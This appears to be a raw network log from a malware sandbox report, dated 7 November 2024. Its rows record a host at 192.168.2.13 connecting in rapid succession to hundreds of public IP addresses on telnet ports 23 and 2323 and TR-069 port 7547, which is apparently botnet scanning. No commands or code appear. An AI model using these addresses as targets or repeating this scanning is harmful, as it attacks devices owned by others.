                                          Nov 7, 2024 11:58:00.479749918 CET30567547192.168.2.1338.109.21.55
                                          Nov 7, 2024 11:58:00.479752064 CET30567547192.168.2.1349.113.2.241
                                          Nov 7, 2024 11:58:00.479749918 CET30567547192.168.2.13222.41.26.203
                                          Nov 7, 2024 11:58:00.479752064 CET30567547192.168.2.13109.45.182.225
                                          Nov 7, 2024 11:58:00.479749918 CET30567547192.168.2.1364.220.173.5
                                          Nov 7, 2024 11:58:00.479760885 CET30567547192.168.2.13147.94.94.212
                                          Nov 7, 2024 11:58:00.479760885 CET30567547192.168.2.139.126.15.25
                                          Nov 7, 2024 11:58:00.479762077 CET30567547192.168.2.13108.241.205.101
                                          Nov 7, 2024 11:58:00.479765892 CET30567547192.168.2.1351.112.53.141
                                          Nov 7, 2024 11:58:00.479767084 CET30567547192.168.2.13221.5.44.75
                                          Nov 7, 2024 11:58:00.479767084 CET30567547192.168.2.13193.218.168.192
                                          Nov 7, 2024 11:58:00.479765892 CET30567547192.168.2.13113.153.66.125
                                          Nov 7, 2024 11:58:00.479767084 CET30567547192.168.2.13220.209.104.8
                                          Nov 7, 2024 11:58:00.479772091 CET30567547192.168.2.1338.136.34.172
                                          Nov 7, 2024 11:58:00.479772091 CET30567547192.168.2.134.31.141.13
                                          Nov 7, 2024 11:58:00.479779005 CET30567547192.168.2.13143.107.107.40
                                          Nov 7, 2024 11:58:00.479779005 CET30567547192.168.2.1332.111.102.74
                                          Nov 7, 2024 11:58:00.479779005 CET30567547192.168.2.13193.45.106.233
                                          Nov 7, 2024 11:58:00.479784966 CET30567547192.168.2.13106.226.139.189
                                          Nov 7, 2024 11:58:00.479795933 CET30567547192.168.2.13148.2.2.197
                                          Nov 7, 2024 11:58:00.479796886 CET30567547192.168.2.13123.167.148.150
                                          Nov 7, 2024 11:58:00.479796886 CET30567547192.168.2.13137.17.108.68
                                          Nov 7, 2024 11:58:00.479799986 CET30567547192.168.2.1392.147.204.167
                                          Nov 7, 2024 11:58:00.479796886 CET30567547192.168.2.13145.79.143.64
                                          Nov 7, 2024 11:58:00.479799986 CET30567547192.168.2.135.38.172.165
                                          Nov 7, 2024 11:58:00.479799986 CET30567547192.168.2.1364.96.182.140
                                          Nov 7, 2024 11:58:00.479799986 CET30567547192.168.2.13155.27.8.89
                                          Nov 7, 2024 11:58:00.479799986 CET30567547192.168.2.1395.166.211.57
                                          Nov 7, 2024 11:58:00.479808092 CET30567547192.168.2.13199.61.254.88
                                          Nov 7, 2024 11:58:00.479809999 CET30567547192.168.2.1371.183.136.89
                                          Nov 7, 2024 11:58:00.479811907 CET30567547192.168.2.13158.222.76.211
                                          Nov 7, 2024 11:58:00.479814053 CET30567547192.168.2.1384.133.62.201
                                          Nov 7, 2024 11:58:00.479814053 CET30567547192.168.2.13209.100.148.72
                                          Nov 7, 2024 11:58:00.479814053 CET30567547192.168.2.13149.4.175.157
                                          Nov 7, 2024 11:58:00.479816914 CET30567547192.168.2.13104.65.87.97
                                          Nov 7, 2024 11:58:00.479814053 CET30567547192.168.2.1398.203.247.0
                                          Nov 7, 2024 11:58:00.479816914 CET30567547192.168.2.1346.228.231.148
                                          Nov 7, 2024 11:58:00.479814053 CET30567547192.168.2.1368.195.5.83
                                          Nov 7, 2024 11:58:00.479814053 CET30567547192.168.2.13156.88.139.126
                                          Nov 7, 2024 11:58:00.479821920 CET30567547192.168.2.1357.47.149.178
                                          Nov 7, 2024 11:58:00.479830027 CET30567547192.168.2.13138.138.233.146
                                          Nov 7, 2024 11:58:00.479834080 CET30567547192.168.2.13140.114.171.49
                                          Nov 7, 2024 11:58:00.479834080 CET30567547192.168.2.13179.141.21.32
                                          Nov 7, 2024 11:58:00.479840994 CET30567547192.168.2.13150.67.180.74
                                          Nov 7, 2024 11:58:00.479840994 CET30567547192.168.2.13178.246.89.170
                                          Nov 7, 2024 11:58:00.479840994 CET30567547192.168.2.1383.228.197.194
                                          Nov 7, 2024 11:58:00.479849100 CET30567547192.168.2.1344.134.199.14
                                          Nov 7, 2024 11:58:00.479851961 CET30567547192.168.2.13120.189.88.169
                                          Nov 7, 2024 11:58:00.479865074 CET30567547192.168.2.1353.104.116.158
                                          Nov 7, 2024 11:58:00.479866982 CET30567547192.168.2.1377.72.2.12
                                          Nov 7, 2024 11:58:00.479868889 CET30567547192.168.2.1361.126.253.39
                                          Nov 7, 2024 11:58:00.479868889 CET30567547192.168.2.13137.124.63.64
                                          Nov 7, 2024 11:58:00.479870081 CET30567547192.168.2.1317.234.189.200
                                          Nov 7, 2024 11:58:00.479870081 CET30567547192.168.2.1398.54.215.139
                                          Nov 7, 2024 11:58:00.479877949 CET30567547192.168.2.1341.115.5.250
                                          Nov 7, 2024 11:58:00.479877949 CET30567547192.168.2.13207.6.40.221
                                          Nov 7, 2024 11:58:00.479882002 CET30567547192.168.2.13200.38.170.103
                                          Nov 7, 2024 11:58:00.479882002 CET30567547192.168.2.13207.50.40.102
                                          Nov 7, 2024 11:58:00.479882956 CET30567547192.168.2.1337.249.198.228
                                          Nov 7, 2024 11:58:00.479888916 CET30567547192.168.2.1366.66.117.255
                                          Nov 7, 2024 11:58:00.479893923 CET30567547192.168.2.1339.189.10.74
                                          Nov 7, 2024 11:58:00.479895115 CET30567547192.168.2.13179.148.65.45
                                          Nov 7, 2024 11:58:00.479895115 CET30567547192.168.2.1335.89.94.150
                                          Nov 7, 2024 11:58:00.479896069 CET30567547192.168.2.13139.171.231.16
                                          Nov 7, 2024 11:58:00.479899883 CET30567547192.168.2.13213.246.69.82
                                          Nov 7, 2024 11:58:00.479899883 CET30567547192.168.2.13164.109.176.79
                                          Nov 7, 2024 11:58:00.479907036 CET30567547192.168.2.13155.39.68.181
                                          Nov 7, 2024 11:58:00.479907036 CET30567547192.168.2.1369.163.190.36
                                          Nov 7, 2024 11:58:00.479907036 CET30567547192.168.2.1325.198.113.42
                                          Nov 7, 2024 11:58:00.479909897 CET30567547192.168.2.1347.89.77.121
                                          Nov 7, 2024 11:58:00.479923964 CET30567547192.168.2.13157.40.16.214
                                          Nov 7, 2024 11:58:00.479924917 CET30567547192.168.2.13191.126.123.151
                                          Nov 7, 2024 11:58:00.479924917 CET30567547192.168.2.13192.154.22.6
                                          Nov 7, 2024 11:58:00.479927063 CET30567547192.168.2.13139.112.146.71
                                          Nov 7, 2024 11:58:00.479927063 CET30567547192.168.2.13176.32.57.11
                                          Nov 7, 2024 11:58:00.479928017 CET30567547192.168.2.1317.180.106.201
                                          Nov 7, 2024 11:58:00.479928017 CET30567547192.168.2.13188.225.82.188
                                          Nov 7, 2024 11:58:00.479928970 CET30567547192.168.2.1346.205.161.84
                                          Nov 7, 2024 11:58:00.479929924 CET30567547192.168.2.1389.113.158.57
                                          Nov 7, 2024 11:58:00.479929924 CET30567547192.168.2.1384.4.8.211
                                          Nov 7, 2024 11:58:00.479929924 CET30567547192.168.2.1319.40.85.11
                                          Nov 7, 2024 11:58:00.479929924 CET30567547192.168.2.1317.49.164.249
                                          Nov 7, 2024 11:58:00.479929924 CET30567547192.168.2.13201.216.233.27
                                          Nov 7, 2024 11:58:00.479938030 CET30567547192.168.2.13194.208.5.207
                                          Nov 7, 2024 11:58:00.479929924 CET30567547192.168.2.1344.111.117.232
                                          Nov 7, 2024 11:58:00.479940891 CET30567547192.168.2.13168.91.166.15
                                          Nov 7, 2024 11:58:00.479940891 CET30567547192.168.2.1352.144.131.168
                                          Nov 7, 2024 11:58:00.479943037 CET30567547192.168.2.1339.86.161.126
                                          Nov 7, 2024 11:58:00.479940891 CET30567547192.168.2.13125.1.241.246
                                          Nov 7, 2024 11:58:00.479943037 CET30567547192.168.2.13220.189.64.122
                                          Nov 7, 2024 11:58:00.479942083 CET30567547192.168.2.13196.241.191.148
                                          Nov 7, 2024 11:58:00.479940891 CET30567547192.168.2.1359.58.91.79
                                          Nov 7, 2024 11:58:00.479942083 CET30567547192.168.2.1366.121.246.18
                                          Nov 7, 2024 11:58:00.479940891 CET30567547192.168.2.1352.117.66.248
                                          Nov 7, 2024 11:58:00.479949951 CET30567547192.168.2.13222.51.31.223
                                          Nov 7, 2024 11:58:00.479948997 CET30567547192.168.2.13165.108.183.179
                                          Nov 7, 2024 11:58:00.479950905 CET30567547192.168.2.13139.133.203.116
                                          Nov 7, 2024 11:58:00.479949951 CET30567547192.168.2.13170.33.207.179
                                          Nov 7, 2024 11:58:00.479940891 CET30567547192.168.2.13108.29.88.230
                                          Nov 7, 2024 11:58:00.479949951 CET30567547192.168.2.13160.33.11.251
                                          Nov 7, 2024 11:58:00.479950905 CET30567547192.168.2.1314.179.152.19
                                          Nov 7, 2024 11:58:00.479948997 CET30567547192.168.2.1358.210.247.200
                                          Nov 7, 2024 11:58:00.479958057 CET30567547192.168.2.1338.111.65.14
                                          Nov 7, 2024 11:58:00.479948997 CET30567547192.168.2.13213.155.222.235
                                          Nov 7, 2024 11:58:00.479955912 CET30567547192.168.2.13132.190.132.95
                                          Nov 7, 2024 11:58:00.479958057 CET30567547192.168.2.13183.23.123.99
                                          Nov 7, 2024 11:58:00.479964018 CET30567547192.168.2.13132.83.246.173
                                          Nov 7, 2024 11:58:00.479964972 CET30567547192.168.2.131.179.84.15
                                          Nov 7, 2024 11:58:00.479968071 CET30567547192.168.2.13118.154.33.53
                                          Nov 7, 2024 11:58:00.479970932 CET30567547192.168.2.1385.69.147.234
                                          Nov 7, 2024 11:58:00.479974985 CET30567547192.168.2.132.10.236.3
                                          Nov 7, 2024 11:58:00.479979992 CET30567547192.168.2.1320.195.168.141
                                          Nov 7, 2024 11:58:00.479983091 CET30567547192.168.2.1382.130.199.84
                                          Nov 7, 2024 11:58:00.479983091 CET30567547192.168.2.1384.96.6.219
                                          Nov 7, 2024 11:58:00.479983091 CET30567547192.168.2.13192.21.33.108
                                          Nov 7, 2024 11:58:00.479983091 CET30567547192.168.2.13187.1.37.1
                                          Nov 7, 2024 11:58:00.479990959 CET30567547192.168.2.1392.150.204.70
                                          Nov 7, 2024 11:58:00.479998112 CET30567547192.168.2.13166.25.32.20
                                          Nov 7, 2024 11:58:00.479998112 CET30567547192.168.2.1389.48.106.186
                                          Nov 7, 2024 11:58:00.479998112 CET30567547192.168.2.13145.16.51.138
                                          Nov 7, 2024 11:58:00.479998112 CET30567547192.168.2.1313.218.101.156
                                          Nov 7, 2024 11:58:00.479998112 CET30567547192.168.2.13140.215.251.203
                                          Nov 7, 2024 11:58:00.480001926 CET30567547192.168.2.13189.246.112.198
                                          Nov 7, 2024 11:58:00.479998112 CET30567547192.168.2.13100.63.3.4
                                          Nov 7, 2024 11:58:00.480003119 CET30567547192.168.2.1385.139.32.172
                                          Nov 7, 2024 11:58:00.480084896 CET513227547192.168.2.13197.131.140.8
                                          Nov 7, 2024 11:58:00.480084896 CET513227547192.168.2.13197.131.140.8
                                          Nov 7, 2024 11:58:00.480607033 CET516207547192.168.2.13197.131.140.8
                                          Nov 7, 2024 11:58:00.484947920 CET754751322197.131.140.8192.168.2.13
                                          Nov 7, 2024 11:58:00.498235941 CET2359244128.52.175.122192.168.2.13
                                          Nov 7, 2024 11:58:00.498361111 CET5924423192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:58:00.498966932 CET5925823192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:58:00.503367901 CET2359244128.52.175.122192.168.2.13
                                          Nov 7, 2024 11:58:00.503899097 CET2359258128.52.175.122192.168.2.13
                                          Nov 7, 2024 11:58:00.503978968 CET5925823192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:58:00.528517008 CET754751322197.131.140.8192.168.2.13
                                          Nov 7, 2024 11:58:00.631201982 CET233716892.13.69.124192.168.2.13
                                          Nov 7, 2024 11:58:00.631354094 CET3716823192.168.2.1392.13.69.124
                                          Nov 7, 2024 11:58:00.631825924 CET3718223192.168.2.1392.13.69.124
                                          Nov 7, 2024 11:58:00.633337021 CET409647547192.168.2.13194.122.191.22
                                          Nov 7, 2024 11:58:00.633339882 CET5063423192.168.2.1380.226.118.23
                                          Nov 7, 2024 11:58:00.633339882 CET3573623192.168.2.13162.236.208.131
                                          Nov 7, 2024 11:58:00.633342981 CET359647547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:58:00.633357048 CET370087547192.168.2.13182.58.1.242
                                          Nov 7, 2024 11:58:00.633357048 CET6085423192.168.2.13180.96.78.149
                                          Nov 7, 2024 11:58:00.633356094 CET5563023192.168.2.1312.215.142.86
                                          Nov 7, 2024 11:58:00.633359909 CET386867547192.168.2.13219.44.145.4
                                          Nov 7, 2024 11:58:00.633362055 CET356927547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:58:00.633362055 CET4988423192.168.2.13106.130.68.178
                                          Nov 7, 2024 11:58:00.633362055 CET4761223192.168.2.1379.132.89.112
                                          Nov 7, 2024 11:58:00.633362055 CET5663623192.168.2.1380.180.18.98
                                          Nov 7, 2024 11:58:00.636338949 CET233716892.13.69.124192.168.2.13
                                          Nov 7, 2024 11:58:00.636677027 CET233718292.13.69.124192.168.2.13
                                          Nov 7, 2024 11:58:00.636734009 CET3718223192.168.2.1392.13.69.124
                                          Nov 7, 2024 11:58:00.638492107 CET235063480.226.118.23192.168.2.13
                                          Nov 7, 2024 11:58:00.638581991 CET5063423192.168.2.1380.226.118.23
                                          Nov 7, 2024 11:58:00.638679981 CET754740964194.122.191.22192.168.2.13
                                          Nov 7, 2024 11:58:00.638691902 CET754735964167.183.152.2192.168.2.13
                                          Nov 7, 2024 11:58:00.638704062 CET2335736162.236.208.131192.168.2.13
                                          Nov 7, 2024 11:58:00.638716936 CET754737008182.58.1.242192.168.2.13
                                          Nov 7, 2024 11:58:00.638725996 CET409647547192.168.2.13194.122.191.22
                                          Nov 7, 2024 11:58:00.638727903 CET2360854180.96.78.149192.168.2.13
                                          Nov 7, 2024 11:58:00.638732910 CET359647547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:58:00.638742924 CET235563012.215.142.86192.168.2.13
                                          Nov 7, 2024 11:58:00.638746023 CET3573623192.168.2.13162.236.208.131
                                          Nov 7, 2024 11:58:00.638755083 CET754738686219.44.145.4192.168.2.13
                                          Nov 7, 2024 11:58:00.638765097 CET234761279.132.89.112192.168.2.13
                                          Nov 7, 2024 11:58:00.638768911 CET6085423192.168.2.13180.96.78.149
                                          Nov 7, 2024 11:58:00.638776064 CET370087547192.168.2.13182.58.1.242
                                          Nov 7, 2024 11:58:00.638776064 CET754735692128.254.238.51192.168.2.13
                                          Nov 7, 2024 11:58:00.638782978 CET5563023192.168.2.1312.215.142.86
                                          Nov 7, 2024 11:58:00.638787031 CET2349884106.130.68.178192.168.2.13
                                          Nov 7, 2024 11:58:00.638799906 CET235663680.180.18.98192.168.2.13
                                          Nov 7, 2024 11:58:00.638811111 CET386867547192.168.2.13219.44.145.4
                                          Nov 7, 2024 11:58:00.638813019 CET356927547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:58:00.638845921 CET4761223192.168.2.1379.132.89.112
                                          Nov 7, 2024 11:58:00.638847113 CET4988423192.168.2.13106.130.68.178
                                          Nov 7, 2024 11:58:00.638847113 CET5663623192.168.2.1380.180.18.98
                                          Nov 7, 2024 11:58:00.639007092 CET359647547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:58:00.639007092 CET359647547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:58:00.639547110 CET362327547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:58:00.640024900 CET409647547192.168.2.13194.122.191.22
                                          Nov 7, 2024 11:58:00.640024900 CET409647547192.168.2.13194.122.191.22
                                          Nov 7, 2024 11:58:00.640513897 CET412107547192.168.2.13194.122.191.22
                                          Nov 7, 2024 11:58:00.641081095 CET370087547192.168.2.13182.58.1.242
                                          Nov 7, 2024 11:58:00.641081095 CET370087547192.168.2.13182.58.1.242
                                          Nov 7, 2024 11:58:00.641530037 CET372747547192.168.2.13182.58.1.242
                                          Nov 7, 2024 11:58:00.642069101 CET386867547192.168.2.13219.44.145.4
                                          Nov 7, 2024 11:58:00.642069101 CET386867547192.168.2.13219.44.145.4
                                          Nov 7, 2024 11:58:00.642601967 CET389487547192.168.2.13219.44.145.4
                                          Nov 7, 2024 11:58:00.643461943 CET356927547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:58:00.643484116 CET356927547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:58:00.643958092 CET754735964167.183.152.2192.168.2.13
                                          Nov 7, 2024 11:58:00.644000053 CET359507547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:58:00.644690990 CET754736232167.183.152.2192.168.2.13
                                          Nov 7, 2024 11:58:00.644759893 CET362327547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:58:00.644759893 CET362327547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:58:00.644759893 CET362327547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:58:00.644853115 CET754740964194.122.191.22192.168.2.13
                                          Nov 7, 2024 11:58:00.645752907 CET754741210194.122.191.22192.168.2.13
                                          Nov 7, 2024 11:58:00.645834923 CET412107547192.168.2.13194.122.191.22
                                          Nov 7, 2024 11:58:00.645834923 CET412107547192.168.2.13194.122.191.22
                                          Nov 7, 2024 11:58:00.645834923 CET412107547192.168.2.13194.122.191.22
                                          Nov 7, 2024 11:58:00.646301985 CET754737008182.58.1.242192.168.2.13
                                          Nov 7, 2024 11:58:00.647187948 CET754738686219.44.145.4192.168.2.13
                                          Nov 7, 2024 11:58:00.648498058 CET754735692128.254.238.51192.168.2.13
                                          Nov 7, 2024 11:58:00.648960114 CET754735950128.254.238.51192.168.2.13
                                          Nov 7, 2024 11:58:00.649029970 CET359507547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:58:00.649029970 CET359507547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:58:00.649029970 CET359507547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:58:00.649750948 CET754736232167.183.152.2192.168.2.13
                                          Nov 7, 2024 11:58:00.651218891 CET754741210194.122.191.22192.168.2.13
                                          Nov 7, 2024 11:58:00.654165030 CET754735950128.254.238.51192.168.2.13
                                          Nov 7, 2024 11:58:00.665342093 CET524147547192.168.2.13110.211.19.120
                                          Nov 7, 2024 11:58:00.665354013 CET542207547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:58:00.665355921 CET376127547192.168.2.1382.217.130.144
                                          Nov 7, 2024 11:58:00.665355921 CET5310423192.168.2.1371.234.3.59
                                          Nov 7, 2024 11:58:00.665355921 CET486002323192.168.2.1396.163.172.32
                                          Nov 7, 2024 11:58:00.665355921 CET467247547192.168.2.1346.158.79.209
                                          Nov 7, 2024 11:58:00.665364027 CET3630623192.168.2.13142.121.147.161
                                          Nov 7, 2024 11:58:00.665361881 CET5172623192.168.2.1366.163.190.7
                                          Nov 7, 2024 11:58:00.665364027 CET441887547192.168.2.13170.242.186.244
                                          Nov 7, 2024 11:58:00.665364027 CET398867547192.168.2.13216.224.7.248
                                          Nov 7, 2024 11:58:00.665369034 CET3362623192.168.2.1377.38.54.150
                                          Nov 7, 2024 11:58:00.665361881 CET5266023192.168.2.13152.55.102.238
                                          Nov 7, 2024 11:58:00.665369034 CET498747547192.168.2.13167.210.14.28
                                          Nov 7, 2024 11:58:00.665363073 CET492507547192.168.2.13193.23.8.185
                                          Nov 7, 2024 11:58:00.665369034 CET4667023192.168.2.13110.39.148.250
                                          Nov 7, 2024 11:58:00.665369987 CET4011623192.168.2.1378.61.85.38
                                          Nov 7, 2024 11:58:00.665369987 CET4488423192.168.2.1397.104.220.6
                                          Nov 7, 2024 11:58:00.665374994 CET3400623192.168.2.13223.150.241.220
                                          Nov 7, 2024 11:58:00.665375948 CET5908823192.168.2.13218.34.132.166
                                          Nov 7, 2024 11:58:00.665375948 CET4016823192.168.2.13198.163.211.242
                                          Nov 7, 2024 11:58:00.665375948 CET5428623192.168.2.13178.143.17.96
                                          Nov 7, 2024 11:58:00.665383101 CET393447547192.168.2.13199.58.155.75
                                          Nov 7, 2024 11:58:00.665385008 CET500122323192.168.2.13174.84.69.60
                                          Nov 7, 2024 11:58:00.670456886 CET754752414110.211.19.120192.168.2.13
                                          Nov 7, 2024 11:58:00.670469999 CET754754220118.8.12.219192.168.2.13
                                          Nov 7, 2024 11:58:00.670562983 CET542207547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:58:00.670564890 CET524147547192.168.2.13110.211.19.120
                                          Nov 7, 2024 11:58:00.670630932 CET524147547192.168.2.13110.211.19.120
                                          Nov 7, 2024 11:58:00.670630932 CET524147547192.168.2.13110.211.19.120
                                          Nov 7, 2024 11:58:00.671082020 CET526227547192.168.2.13110.211.19.120
                                          Nov 7, 2024 11:58:00.671726942 CET542207547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:58:00.671727896 CET542207547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:58:00.672137022 CET544407547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:58:00.675719023 CET754752414110.211.19.120192.168.2.13
                                          Nov 7, 2024 11:58:00.676722050 CET754754220118.8.12.219192.168.2.13
                                          Nov 7, 2024 11:58:00.677067995 CET754754440118.8.12.219192.168.2.13
                                          Nov 7, 2024 11:58:00.677114010 CET544407547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:58:00.677134037 CET544407547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:58:00.677134037 CET544407547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:58:00.681967974 CET754754440118.8.12.219192.168.2.13
                                          Nov 7, 2024 11:58:00.689344883 CET754738686219.44.145.4192.168.2.13
                                          Nov 7, 2024 11:58:00.689357042 CET754737008182.58.1.242192.168.2.13
                                          Nov 7, 2024 11:58:00.689366102 CET754740964194.122.191.22192.168.2.13
                                          Nov 7, 2024 11:58:00.689374924 CET754735964167.183.152.2192.168.2.13
                                          Nov 7, 2024 11:58:00.692389011 CET754741210194.122.191.22192.168.2.13
                                          Nov 7, 2024 11:58:00.692403078 CET754736232167.183.152.2192.168.2.13
                                          Nov 7, 2024 11:58:00.692414045 CET754735692128.254.238.51192.168.2.13
                                          Nov 7, 2024 11:58:00.697325945 CET4770023192.168.2.135.185.3.170
                                          Nov 7, 2024 11:58:00.697329044 CET5745223192.168.2.1391.98.200.129
                                          Nov 7, 2024 11:58:00.697329998 CET553207547192.168.2.1346.229.152.199
                                          Nov 7, 2024 11:58:00.697329044 CET510167547192.168.2.13143.242.231.169
                                          Nov 7, 2024 11:58:00.697335958 CET3551023192.168.2.1373.123.25.202
                                          Nov 7, 2024 11:58:00.697335958 CET4068823192.168.2.13166.172.109.29
                                          Nov 7, 2024 11:58:00.697341919 CET4654823192.168.2.13138.136.132.124
                                          Nov 7, 2024 11:58:00.697335958 CET533047547192.168.2.13143.249.137.26
                                          Nov 7, 2024 11:58:00.697345018 CET366027547192.168.2.1344.213.15.85
                                          Nov 7, 2024 11:58:00.697344065 CET4009823192.168.2.131.198.187.4
                                          Nov 7, 2024 11:58:00.697345018 CET449927547192.168.2.13144.182.249.102
                                          Nov 7, 2024 11:58:00.697365046 CET5288023192.168.2.1323.121.174.92
                                          Nov 7, 2024 11:58:00.697366953 CET448402323192.168.2.13102.61.117.64
                                          Nov 7, 2024 11:58:00.697366953 CET4309023192.168.2.13186.198.250.34
                                          Nov 7, 2024 11:58:00.697367907 CET4514423192.168.2.1350.22.151.61
                                          Nov 7, 2024 11:58:00.697366953 CET348547547192.168.2.1343.168.39.9
                                          Nov 7, 2024 11:58:00.697367907 CET5181023192.168.2.1353.95.188.14
                                          Nov 7, 2024 11:58:00.697366953 CET5444023192.168.2.1395.75.253.253
                                          Nov 7, 2024 11:58:00.697380066 CET4347023192.168.2.13124.225.211.33
                                          Nov 7, 2024 11:58:00.697380066 CET4123623192.168.2.1389.153.207.175
                                          Nov 7, 2024 11:58:00.697380066 CET456787547192.168.2.13188.192.33.17
                                          Nov 7, 2024 11:58:00.697385073 CET574767547192.168.2.1388.52.144.208
                                          Nov 7, 2024 11:58:00.697385073 CET4531623192.168.2.13138.105.105.159
                                          Nov 7, 2024 11:58:00.697388887 CET3352223192.168.2.13129.3.14.255
                                          Nov 7, 2024 11:58:00.697388887 CET589402323192.168.2.13155.130.102.8
                                          Nov 7, 2024 11:58:00.697388887 CET3766423192.168.2.13211.203.171.23
                                          Nov 7, 2024 11:58:00.697388887 CET593627547192.168.2.13200.216.17.231
                                          Nov 7, 2024 11:58:00.697391033 CET402147547192.168.2.1361.64.58.161
                                          Nov 7, 2024 11:58:00.700486898 CET754735950128.254.238.51192.168.2.13
                                          Nov 7, 2024 11:58:00.702327967 CET75475532046.229.152.199192.168.2.13
                                          Nov 7, 2024 11:58:00.702394962 CET553207547192.168.2.1346.229.152.199
                                          Nov 7, 2024 11:58:00.702419996 CET23477005.185.3.170192.168.2.13
                                          Nov 7, 2024 11:58:00.702469110 CET553207547192.168.2.1346.229.152.199
                                          Nov 7, 2024 11:58:00.702487946 CET4770023192.168.2.135.185.3.170
                                          Nov 7, 2024 11:58:00.702579021 CET553207547192.168.2.1346.229.152.199
                                          Nov 7, 2024 11:58:00.703036070 CET554667547192.168.2.1346.229.152.199
                                          Nov 7, 2024 11:58:00.707520962 CET75475532046.229.152.199192.168.2.13
                                          Nov 7, 2024 11:58:00.715785980 CET234515860.114.104.239192.168.2.13
                                          Nov 7, 2024 11:58:00.715876102 CET4515823192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:58:00.716504097 CET4518823192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:58:00.720356941 CET754752414110.211.19.120192.168.2.13
                                          Nov 7, 2024 11:58:00.720863104 CET234515860.114.104.239192.168.2.13
                                          Nov 7, 2024 11:58:00.721461058 CET234518860.114.104.239192.168.2.13
                                          Nov 7, 2024 11:58:00.721546888 CET4518823192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:58:00.724478006 CET754754220118.8.12.219192.168.2.13
                                          Nov 7, 2024 11:58:00.724858046 CET754754440118.8.12.219192.168.2.13
                                          Nov 7, 2024 11:58:00.729330063 CET588207547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:58:00.729330063 CET348082323192.168.2.13163.126.157.42
                                          Nov 7, 2024 11:58:00.729345083 CET3416623192.168.2.13143.44.21.74
                                          Nov 7, 2024 11:58:00.729345083 CET398662323192.168.2.1334.59.58.112
                                          Nov 7, 2024 11:58:00.729353905 CET4663423192.168.2.1341.198.39.179
                                          Nov 7, 2024 11:58:00.729356050 CET475987547192.168.2.1387.74.210.177
                                          Nov 7, 2024 11:58:00.729358912 CET5543023192.168.2.13181.143.145.183
                                          Nov 7, 2024 11:58:00.729358912 CET351627547192.168.2.13164.67.111.183
                                          Nov 7, 2024 11:58:00.729358912 CET592567547192.168.2.13220.47.31.232
                                          Nov 7, 2024 11:58:00.729358912 CET553767547192.168.2.1389.88.8.86
                                          Nov 7, 2024 11:58:00.729358912 CET5820423192.168.2.1398.108.52.182
                                          Nov 7, 2024 11:58:00.729368925 CET483007547192.168.2.13163.7.213.125
                                          Nov 7, 2024 11:58:00.729368925 CET401507547192.168.2.13159.248.124.230
                                          Nov 7, 2024 11:58:00.729371071 CET4256823192.168.2.13109.42.181.206
                                          Nov 7, 2024 11:58:00.729374886 CET3464423192.168.2.13116.96.35.22
                                          Nov 7, 2024 11:58:00.729376078 CET4079423192.168.2.1396.169.164.205
                                          Nov 7, 2024 11:58:00.729376078 CET555727547192.168.2.13135.130.179.126
                                          Nov 7, 2024 11:58:00.729372025 CET5961423192.168.2.13145.145.81.5
                                          Nov 7, 2024 11:58:00.729389906 CET389042323192.168.2.13176.133.64.66
                                          Nov 7, 2024 11:58:00.729396105 CET3434023192.168.2.1368.27.161.2
                                          Nov 7, 2024 11:58:00.729418993 CET519167547192.168.2.1375.183.209.41
                                          Nov 7, 2024 11:58:00.729418993 CET5213023192.168.2.13179.204.124.183
                                          Nov 7, 2024 11:58:00.734257936 CET754758820141.151.90.91192.168.2.13
                                          Nov 7, 2024 11:58:00.734308958 CET588207547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:58:00.734426975 CET588207547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:58:00.734426975 CET588207547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:58:00.734757900 CET2334166143.44.21.74192.168.2.13
                                          Nov 7, 2024 11:58:00.734847069 CET3416623192.168.2.13143.44.21.74
                                          Nov 7, 2024 11:58:00.734899998 CET589187547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:58:00.739363909 CET754758820141.151.90.91192.168.2.13
                                          Nov 7, 2024 11:58:00.740309000 CET754758918141.151.90.91192.168.2.13
                                          Nov 7, 2024 11:58:00.740407944 CET589187547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:58:00.740407944 CET589187547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:58:00.740407944 CET589187547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:58:00.745419979 CET754758918141.151.90.91192.168.2.13
                                          Nov 7, 2024 11:58:00.752701998 CET75475532046.229.152.199192.168.2.13
                                          Nov 7, 2024 11:58:00.761327028 CET448847547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:58:00.761331081 CET440787547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:58:00.761332989 CET430967547192.168.2.13113.16.91.104
                                          Nov 7, 2024 11:58:00.761334896 CET599627547192.168.2.1334.183.63.81
                                          Nov 7, 2024 11:58:00.761334896 CET364767547192.168.2.13217.144.32.43
                                          Nov 7, 2024 11:58:00.761334896 CET522887547192.168.2.134.230.209.133
                                          Nov 7, 2024 11:58:00.761334896 CET368987547192.168.2.1371.254.190.14
